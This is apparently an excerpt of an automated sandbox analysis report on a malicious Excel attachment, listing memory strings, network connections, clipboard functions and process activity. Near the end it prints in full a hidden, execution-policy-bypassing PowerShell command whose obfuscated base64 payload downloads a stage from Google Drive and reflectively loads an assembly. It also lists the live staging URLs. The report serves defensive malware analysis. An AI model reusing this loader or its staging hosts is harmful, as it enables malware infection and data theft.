Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dWNo.img?h=166&w=31
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dtuY.img?h=333&w=31
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e0XT.img?h=166&w=31
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e3cA.img?h=75&w=100
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e5NB.img?h=75&w=100
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e7Ai.img?h=250&w=30
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e9Q0.img?h=166&w=31
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17eeI9.img?h=75&w=100
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17ejTJ.img?h=75&w=100
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBYMDHp.img?h=27&w=27&m
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBZbaoj.img?h=16&w=16&m
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBh7lZF.img?h=333&w=311
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlKGpe.img?h=75&w=100&
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlPHfm.img?h=16&w=16&m
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnMzWD.img?h=16&w=16&m
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBqRcpR.img?h=16&w=16&m
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: http://static.chartbeat.com/js/chartbeat.js
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
Source: mshta.exe, 00000004.00000002.413158263.0000000003639000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.409103792.0000000003638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462562168.0000000003AD9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.464216261.0000000003ADC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.463866042.0000000003ADA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: mshta.exe, 00000004.00000002.413158263.0000000003639000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.409103792.0000000003638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462562168.0000000003AD9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.464216261.0000000003ADC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.463866042.0000000003ADA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: CasPol.exe, CasPol.exe, 0000002A.00000002.502668973.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com
Source: CasPol.exe, CasPol.exe, 0000002A.00000002.502668973.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.com
Source: CasPol.exe, 0000002A.00000002.502030748.000000000018C000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://www.imvu.com/k
Source: CasPol.exe, 0000002A.00000002.502668973.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: CasPol.exe, 0000002A.00000002.502668973.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comr
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: http://www.msn.com/
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: http://www.msn.com/advertisement.ad.js
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
Source: CasPol.exe, 0000001F.00000002.512443413.00000000003A4000.00000004.00000010.00020000.00000000.sdmp, CasPol.exe, 0000002E.00000002.519745743.00000000001AF000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net
Source: CasPol.exe, 0000002A.00000002.502668973.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net/
Source: mshta.exe, 00000004.00000002.413158263.0000000003639000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.409103792.0000000003638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.413123057.0000000003620000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462590642.00000000003E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.463992817.00000000003E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://acesso.run/
Source: mshta.exe, 00000004.00000002.413123057.0000000003620000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://acesso.run/)
Source: mshta.exe, 00000010.00000002.463992817.000000000037E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.464216261.0000000003ADC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462590642.000000000037E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.463866042.0000000003ADA000.00000004.00000020.00020000.00000000.sdmp, A & C Metrology OC 545714677889Materiale.xls, 7B130000.0.dr	String found in binary or memory: https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrain
Source: mshta.exe, 00000010.00000003.462590642.0000000000391000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrain-v
Source: mshta.exe, 00000004.00000002.412317283.000000000012D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406433145.000000000012D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.411412391.000000000012C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrainD4
Source: mshta.exe, 00000004.00000002.412282901.000000000010A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrainG4
Source: mshta.exe, 00000004.00000003.406433145.0000000000140000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrainI
Source: mshta.exe, 00000004.00000003.406433145.000000000012D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.411412391.000000000012C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrainJ4
Source: mshta.exe, 00000004.00000002.412282901.000000000010A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrainZ4
Source: mshta.exe, 00000010.00000002.463967670.000000000035A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrainyX
Source: mshta.exe, 00000004.00000003.406433145.000000000017E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrain~4
Source: mshta.exe, 00000010.00000002.463967670.000000000035A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://acesso.run/O
Source: mshta.exe, 00000010.00000003.463866042.0000000003AAC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.464197868.0000000003AAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://acesso.run/d
Source: mshta.exe, 00000004.00000002.413158263.0000000003639000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.409103792.0000000003638000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://acesso.run/koE
Source: mshta.exe, 00000010.00000003.463866042.0000000003AAC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.464197868.0000000003AAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://acesso.run/p
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: https://contextual.media.net/
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: https://contextual.media.net/8/nrrV73987.js
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
Source: bhv417.tmp.31.dr	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
Source: powershell.exe, 00000005.00000002.431955352.00000000120C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.431955352.00000000120C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.431955352.00000000120C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: powershell.exe, 0000000F.00000002.480727505.0000000002552000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.531067670.0000000002542000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com
Source: powershell.exe, 0000001B.00000002.531067670.0000000002542000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
Source: powershell.exe, 0000000F.00000002.480727505.0000000002717000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.531067670.0000000002707000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com
Source: powershell.exe, 0000000F.00000002.480727505.0000000002717000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.531067670.0000000002707000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download
Source: bhv417.tmp.31.dr	String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: CasPol.exe	String found in binary or memory: https://login.yahoo.com/config/login
Source: powershell.exe, 00000005.00000002.431955352.00000000120C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: https://policies.yahoo.com/w3c/p3p.xml
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: https://s.yimg.com/lo/api/res/1.2/cKqYjmGd5NGRXh6Xptm6Yg--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
Source: mshta.exe, 00000004.00000002.413158263.0000000003639000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.409103792.0000000003638000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.462562168.0000000003AD9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.464216261.0000000003ADC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.463866042.0000000003ADA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
Source: CasPol.exe, 0000001F.00000002.516164879.000000000216A000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.516435437.000000000220A000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000002E.00000002.523035849.0000000002159000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000002E.00000002.523294829.00000000021FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: https://www.ccleaner.com/go/app_cc_pro_trialkey
Source: CasPol.exe, CasPol.exe, 0000002A.00000002.502668973.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: CasPol.exe	String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.dr	String found in binary or memory: https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033

Source: unknown	Network traffic detected: HTTP traffic on port 49161 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49175
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49163
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49161
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49175 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49166 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49173 -> 443

Source: unknown	HTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49161 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.74.191:443 -> 192.168.2.22:49163 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.74.191:443 -> 192.168.2.22:49171 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.74.191:443 -> 192.168.2.22:49170 version: TLS 1.2

Contains functionality for read data from the clipboard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 31_2_0041183A OpenClipboard,GetLastError,DeleteFileW,

31_2_0041183A

Contains functionality to modify clipboard data

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,	31_2_0040987A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	31_2_004098E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	41_2_00406DFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,	41_2_00406E9F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 42_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,	42_2_004068B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 42_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,	42_2_004072B5

Creates a window with clipboard capturing capabilities

Source: C:\Windows\System32\mshta.exe	Window created: window name: CLIPBRDWNDCLASS			Jump to behavior
Source: C:\Windows\System32\mshta.exe	Window created: window name: CLIPBRDWNDCLASS

Too many similar processes found

Source: CasPol.exe

Process created: 40

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 2140, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3972, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Excel sheet contains many unusual embedded objects

Source: A & C Metrology OC 545714677889Materiale.xls	OLE: Microsoft Excel 2007+
Source: A & C Metrology OC 545714677889Materiale.xls	OLE: Microsoft Excel 2007+
Source: ~DFE74F55484018A372.TMP.0.dr	OLE: Microsoft Excel 2007+
Source: 7B130000.0.dr	OLE: Microsoft Excel 2007+
Source: 7B130000.0.dr	OLE: Microsoft Excel 2007+

Microsoft Office drops suspicious files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ernashgetmebackwithgoodnewswhichgrreatthings[1].hta

Jump to behavior

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzSG9NRVsyMV0rJFBzaE9tRVszMF0rJ3gnKSgoJ1prYWltYWdlVXJsID0gUUN4aHQnKyd0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjYnKyd2UzRzVU95Ym5ILXNEdlVoQll3dXIgUUN4O1prYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllbnQ7WmthaW1hZ2VCJysneXRlcyA9IFprYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoWmthaW1hZ2VVcmwpO1prYWltYWdlVGV4dCA9IFtTeXN0JysnZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFprYWltYWdlQnl0ZXMpO1prYXN0YXJ0RmxhZyA9IFFDeDwnKyc8QkFTRTY0X1NUQVJUPj5RQ3g7WmthZW5kRmxhZyA9IFFDeDw8QkFTRTY0X0VORD4+UUN4O1prYXN0YXJ0SW5kZXggPSBaa2FpbWFnZVRleHQuSW5kZXhPZihaa2FzdGFydEZsYWcpO1prYWVuZEluZGV4ID0gWmthaW1hZ2VUZXh0LkluZGV4T2YoWmthZW5kRmxhZycrJyk7Wmthc3RhcnRJbmRleCAtZ2UgMCAtYW4nKydkIFprYWVuZEluZGV4IC1ndCBaJysna2FzdCcrJ2FydEluZGV4O1prYXN0YXJ0SW4nKydkZXggKz0gWmthc3RhcnRGbGFnLkxlbmd0aDtaa2FiYXNlNjRMZW5ndGgnKycgPSBaa2FlbmRJbmRleCAtIFprYXN0YXJ0SW5kZXg7WmthYmFzZTY0Q29tbWFuZCA9IFprYWltYWdlVGV4dC5TdWJzdHJpbicrJ2coWmthc3RhcnRJbmRleCwgJysnWmthYmFzJysnZTY0TGVuZ3RoKTtaa2FiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChaa2FiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgS041IEZvckVhY2gtT2JqZWN0IHsgWmsnKydhXyB9KVstMS4uLShaa2FiJysnYXMnKydlNjRDb21tYW5kLkxlbmd0aCldO1prYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlJysnNjRTdHJpbmcoWmthYmFzZTY0UmV2ZXJzZWQpO1prYWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChaa2Fjb21tYScrJ25kQnl0ZXMpO1prYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoUUN4VkFJUUN4KTtaa2F2YWlNZXRob2QuSW52b2tlKFprYW51bGwsIEAoUUN4dHh0LlJSRlZHR0ZSLzc1LzY0LjY0MS40NzEuNzAxLy86cHR0aFFDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUMnKyd4ZGVzYXRpdmFkb1FDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUN4Q2FzJysnUG9sUUN4LCBRQ3hkZXNhdGl2YWRvUScrJ0N4LCBRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3gxUUN4LFFDeGRlc2F0aXZhZG9RQ3gpKTsnKS5yRVBMYUNlKChbY0hhUl05MCtbY0hhUl0xMDcrW2NIYVJdOTcpLFtzVHJJbmddW2NIYVJdMzYpLnJFUExhQ2UoJ0tONScsW3NUckluZ11bY0hhUl0xMjQpLnJFUExhQ2UoKFtjSGFSXTgxK1tjSGFSXTY3K1tjSGFSXTEyMCksW3NUckluZ11bY0hhUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzSG9NRVsyMV0rJFBzaE9tRVszMF0rJ3gnKSgoJ1prYWltYWdlVXJsID0gUUN4aHQnKyd0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjYnKyd2UzRzVU95Ym5ILXNEdlVoQll3dXIgUUN4O1prYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllbnQ7WmthaW1hZ2VCJysneXRlcyA9IFprYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoWmthaW1hZ2VVcmwpO1prYWltYWdlVGV4dCA9IFtTeXN0JysnZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFprYWltYWdlQnl0ZXMpO1prYXN0YXJ0RmxhZyA9IFFDeDwnKyc8QkFTRTY0X1NUQVJUPj5RQ3g7WmthZW5kRmxhZyA9IFFDeDw8QkFTRTY0X0VORD4+UUN4O1prYXN0YXJ0SW5kZXggPSBaa2FpbWFnZVRleHQuSW5kZXhPZihaa2FzdGFydEZsYWcpO1prYWVuZEluZGV4ID0gWmthaW1hZ2VUZXh0LkluZGV4T2YoWmthZW5kRmxhZycrJyk7Wmthc3RhcnRJbmRleCAtZ2UgMCAtYW4nKydkIFprYWVuZEluZGV4IC1ndCBaJysna2FzdCcrJ2FydEluZGV4O1prYXN0YXJ0SW4nKydkZXggKz0gWmthc3RhcnRGbGFnLkxlbmd0aDtaa2FiYXNlNjRMZW5ndGgnKycgPSBaa2FlbmRJbmRleCAtIFprYXN0YXJ0SW5kZXg7WmthYmFzZTY0Q29tbWFuZCA9IFprYWltYWdlVGV4dC5TdWJzdHJpbicrJ2coWmthc3RhcnRJbmRleCwgJysnWmthYmFzJysnZTY0TGVuZ3RoKTtaa2FiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChaa2FiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgS041IEZvckVhY2gtT2JqZWN0IHsgWmsnKydhXyB9KVstMS4uLShaa2FiJysnYXMnKydlNjRDb21tYW5kLkxlbmd0aCldO1prYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlJysnNjRTdHJpbmcoWmthYmFzZTY0UmV2ZXJzZWQpO1prYWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChaa2Fjb21tYScrJ25kQnl0ZXMpO1prYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoUUN4VkFJUUN4KTtaa2F2YWlNZXRob2QuSW52b2tlKFprYW51bGwsIEAoUUN4dHh0LlJSRlZHR0ZSLzc1LzY0LjY0MS40NzEuNzAxLy86cHR0aFFDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUMnKyd4ZGVzYXRpdmFkb1FDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUN4Q2FzJysnUG9sUUN4LCBRQ3hkZXNhdGl2YWRvUScrJ0N4LCBRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3gxUUN4LFFDeGRlc2F0aXZhZG9RQ3gpKTsnKS5yRVBMYUNlKChbY0hhUl05MCtbY0hhUl0xMDcrW2NIYVJdOTcpLFtzVHJJbmddW2NIYVJdMzYpLnJFUExhQ2UoJ0tONScsW3NUckluZ11bY0hhUl0xMjQpLnJFUExhQ2UoKFtjSGFSXTgxK1tjSGFSXTY3K1tjSGFSXTEyMCksW3NUckluZ11bY0hhUl0zOSkp';$OWjuxd = 